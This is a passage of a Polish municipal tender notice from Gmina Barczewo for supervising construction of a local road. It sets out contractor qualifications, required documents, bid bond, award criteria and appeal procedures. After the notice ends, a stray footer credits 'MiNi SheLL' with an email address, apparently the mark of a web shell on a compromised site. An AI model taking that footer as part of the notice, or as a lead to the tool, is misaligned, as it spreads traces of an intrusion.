                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1	Wykonawcy:
Wykonawca spełni warunek, jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  to                 w tym okresie, należycie zrealizował co najmniej dwie usługi nadzoru inwestorskiego nad robotami budowlanymi obejmującymi  budowę dróg i/lub ulic o łącznej długości dróg lub ulic co najmniej 3 km (każde zadanie) lub całkowitej wartości nadzorowanych robót drogowych równej co najmniej kwocie 16.000.000,00 PLN brutto (każde zadanie).
	UWAGA:
a)	Za zrealizowanie usługi należy rozumieć doprowadzenie co najmniej do wystawienia Protokołu odbioru robót lub zakończenia realizacji umowy na świadczenie usług nadzoru.
b)	Za drogę lub ulicę, Zamawiający uzna drogę lub ulicę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2015 r. poz. 460, 774, 870, 1336, 1830, 1890, 2281, z 2016 r. poz. 770).
c)	W przypadku wartości wykonanych robót podanej w innej walucie niż PLN, Zamawiający w celu sprawdzenia spełnienia wymaganego powyżej warunku udziału w postępowaniu przeliczy te wartości na PLN wg średniego kursu złotego w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski, obowiązującego na dzień, w którym zostało opublikowane ogłoszenie                        o zamówieniu w Biuletynie Zamówień Publicznych. 

2	osób skierowanych przez Wykonawcę do realizacji zamówienia:
Wykonawca spełni warunek, jeśli wykaże, że do realizacji przedmiotu zamówienia dysponuje następującymi osobami odpowiedzialnymi za świadczenie usług, posiadającymi stosowne kwalifikacje zawodowe, uprawnienia i doświadczenie, które zostaną skierowane przez Wykonawcę do realizacji zadania:
A)	Kierownik Zespołu  (jedna osoba) posiadający:
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót drogowych przy realizacji co najmniej dwóch zakończonych zadań polegających na budowie dróg i/lub ulic nie wcześniej niż w okresie ostatnich 10 lat od dnia terminu składania ofert, obejmujących budowę dróg i/lub ulic;
	uprawnienia budowlane do nadzorowania robót budowlanych                               w specjalności drogowej bez ograniczeń w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278);
  
B)	Inspektor nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  (jedna osoba) posiadający:
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót elektrycznych na co najmniej dwóch zakończonych zadaniach nie wcześniej niż w okresie ostatnich 5 lat od dnia terminu składania ofert,;
	uprawnienia budowlane do nadzorowania robót budowlanych bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278);
C)	Inspektor nadzoru w specjalności instalacyjnej, w zakresie sieci telekomunikacyjnych  (jedna osoba) posiadający: 
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót telekomunikacyjnych na co najmniej jednym zakończonym zadaniu nie wcześniej niż w okresie ostatnich 5 lat od dnia terminu składania ofert;
	uprawnienia budowlane do nadzorowania robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń w zakresie telekomunikacji przewodowej wraz z infrastrukturą telekomunikacyjną w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278);
D)	Inspektor nadzoru w specjalności instalacyjnej, w zakresie sieci gazowych, cieplnych, wodociągowych i kanalizacyjnych  (jedna osoba) posiadający:
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót sanitarnych na co najmniej dwóch zakończonych zadaniach nie wcześniej niż w okresie ostatnich 5 lat od dnia terminu składania ofert;
	uprawnienia budowlane do nadzorowani robót budowlanych bez ograniczeń  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r.                  w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278);
E)	Inspektor nadzoru w specjalności konstrukcyjno-budowlanej  (jedna osoba) posiadający:
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót konstrukcyjno-budowlanych na co najmniej dwóch zakończonych zadaniach nie wcześniej niż w okresie ostatnich 5 lat od dnia terminu składania ofert;
	uprawnienia budowlane do nadzorowania robót budowlanych bez ograniczeń w specjalności konstrukcyjno-budowlanej w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278);
F)	Inspektor nadzoru w specjalności instalacyjnej, w zakresie sieci gazowych, cieplnych, wodociągowych i kanalizacyjnych  (jedna osoba) posiadający:
	doświadczenie zawodowe polegające na pełnieniu funkcji inspektora nadzoru robót gazowych na co najmniej dwóch zakończonych zadaniach nie wcześniej niż w okresie ostatnich 5 lat od dnia terminu składania ofert;
	uprawnienia budowlane do nadzorowania robót budowlanych bez ograniczeń w specjalności instalacyjnej w zakresie sieci gazowych w rozumieniu Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r.                   w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 r. poz. 1278). 
UWAGA:
a)	Zamawiający dopuszcza możliwość łączenia powyższych funkcji przez poszczególne osoby skierowane przez Wykonawcę do realizacji zamówienia.
b)	Jako zakończenie zadania należy rozumieć wystawienie co najmniej podpisanego protokołu odbioru robót. 
c)	Za drogę lub ulicę, Zamawiający uzna drogę lub ulicę w rozumieniu ustawy                 z dnia 21 marca 1985 r. o drogach publicznych (Dz. U. z 2015 r. poz. 460, 774, 870, 1336, 1830, 1890, 2281, z 2016 r. poz. 770).
d)	Zamawiający określając wymogi dla osób wskazanych w pkt 5.1.3.2 siwz                       w zakresie posiadanych uprawnień budowlanych wymaga uprawnień                w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2016 r. poz. 290 ze zm.) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju                  z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych                     w budownictwie (Dz. U. 2014 r. poz. 1278).
e)	Zamawiający zaakceptuje uprawnienia budowlane odpowiadające wymaganym uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65)
f)	Na podstawie art. 104 ustawy Prawo budowlane osoby, które przed dniem wejścia w życie w/w ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu                      i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">A)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,   w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
B)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt A, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem tego terminu.
C)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt B, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />A)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  wg wzoru załącznik nr 6;
B)	wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami,          o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny                     o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy  wg wzoru załącznik nr 7 do siwz.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Formularz oferty  wg wzoru załącznik nr 1 do siwz.
2.	Pełnomocnictwo złożone w formie oryginału lub potwierdzonej notarialnie kopii, wskazujące osobę uprawnioną do reprezentowania Wykonawcy, w sytuacji gdy zasady reprezentacji nie wynikają jednoznacznie z dokumentu rejestracyjnego (ewidencyjnego). 
3.Dowód wniesienia wadium
4. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 3 ustawy Pzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w ust. 1 pkt 23. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia  wg wzoru załącznik nr 5 do siwz. 
5. Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia  wg wzoru załącznik nr 4 do siwz  w sytuacji gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów (art. 22a ust. 2 ustawy Pzp).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca zobligowany jest wnieść wadium w wysokości 4.000 zł (słownie: cztery tysiące złotych).

2.	Wadium należy wnieść przed terminem składania ofert. Wadium musi obejmować cały okres związania ofertą. 

3.	Wadium może być wniesione w jednej lub kilku następujących formach:
1) w pieniądzu  przelewem na rachunek bankowy nr 61934310280000060620000040
z dopiskiem  wadium na przetarg: Nadzór inwestorski nad realizacją zadania pn. Budowa drogi gminnej od drogi powiatowej nr 1448N przez Nikielkowo i Wójtowo do DK 16; kserokopię dowodu wpłaty należy dołączyć do oferty,
		2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	3) gwarancjach bankowych,
	4) gwarancjach ubezpieczeniowych,
	5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r., poz. 359).

4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w pkt 9.3. siwz, przed upływem terminu składania ofert, tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert. 

5.	Oryginały gwarancji lub poręczeń powinny być załączone luźno do oferty.

6.	Wadia wniesione w formie gwarancji lub poręczeń powinny w swej treści mieć wymienionych wszystkich Wykonawców wspólnie ubiegających się o wykonanie                       i realizację zamówienia publicznego, tj. członków konsorcjum/spółki cywilnej. 

7.	Z treści gwarancji/poręczeń winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.

8.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.

8.9.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.   	

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA BRUTTO OFERTY </td><td>60</td></tr><tr><td>DOŚWIADCZENIE KIEROWNIKA ZESPOŁU </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiany umowy zostały opisane we wzorze umowy stanowiącym załącznik nr 8 do siwz. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/01/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              PL - język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wszelkie oświadczenia, wnioski, zawiadomienia i informacje Zamawiający oraz Wykonawcy, za wyjątkiem oferty i umowy oraz oświadczeń i dokumentów wymienionych w pkt 6 siwz (również w przypadku ich złożenia w wyniku wezwania  o którym mowa w art. 26 ust. 3 ustawy Pzp) dla których Prawodawca przewidział wyłącznie formę pisemną, przekazują:
a)	pisemnie za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe, osobiście, za pośrednictwem posłańca na adres Zamawiającego tj.: Gmina Barczewo, Plac Ratuszowy 1, 11-010 Barczewo, lub
b)	faksem na numer 089 514 85 62, lub
c)	przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną na adres e-mail darek.b@barczewo.pl.

1	Wykonawcom, a także innym podmiotom, jeżeli mają lub mieli interes prawny                        w uzyskaniu danego zamówienia oraz ponieśli lub mogą ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Prawo zamówień publicznych, przysługują środki ochrony prawnej przewidziane w dziale VI ustawy Pzp: odwołanie i skarga do Sądu.

2.	Odwołanie przysługuje wyłącznie wobec czynności:
	1) określenia warunków udziału w postępowaniu;
	2) wykluczenia odwołującego Wykonawcy z postępowania o udzielenie zamówienia;
	3) odrzucenie oferty odwołującego Wykonawcy;
	4) opisu przedmiotu zamówienia;
	5) wyboru najkorzystniejszej oferty.

3.	Odwołanie powinno wskazywać czynność lub zaniechanie wykonania czynności Zamawiającego, której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne uzasadniające wniesienie odwołania.

4.	Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu w terminie określonym w art. 182 ustawy wraz z dowodem uiszczenia wpisu.

5.	Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.

6.	Jeżeli koniec terminu do wykonania czynności przypada na sobotę lub dzień ustawowo wolny od pracy, termin upływa dnia następnego po dniu lub dniach wolnych od pracy.

7.	Na orzeczenie Krajowej Izby Odwoławczej stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do Sądu.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com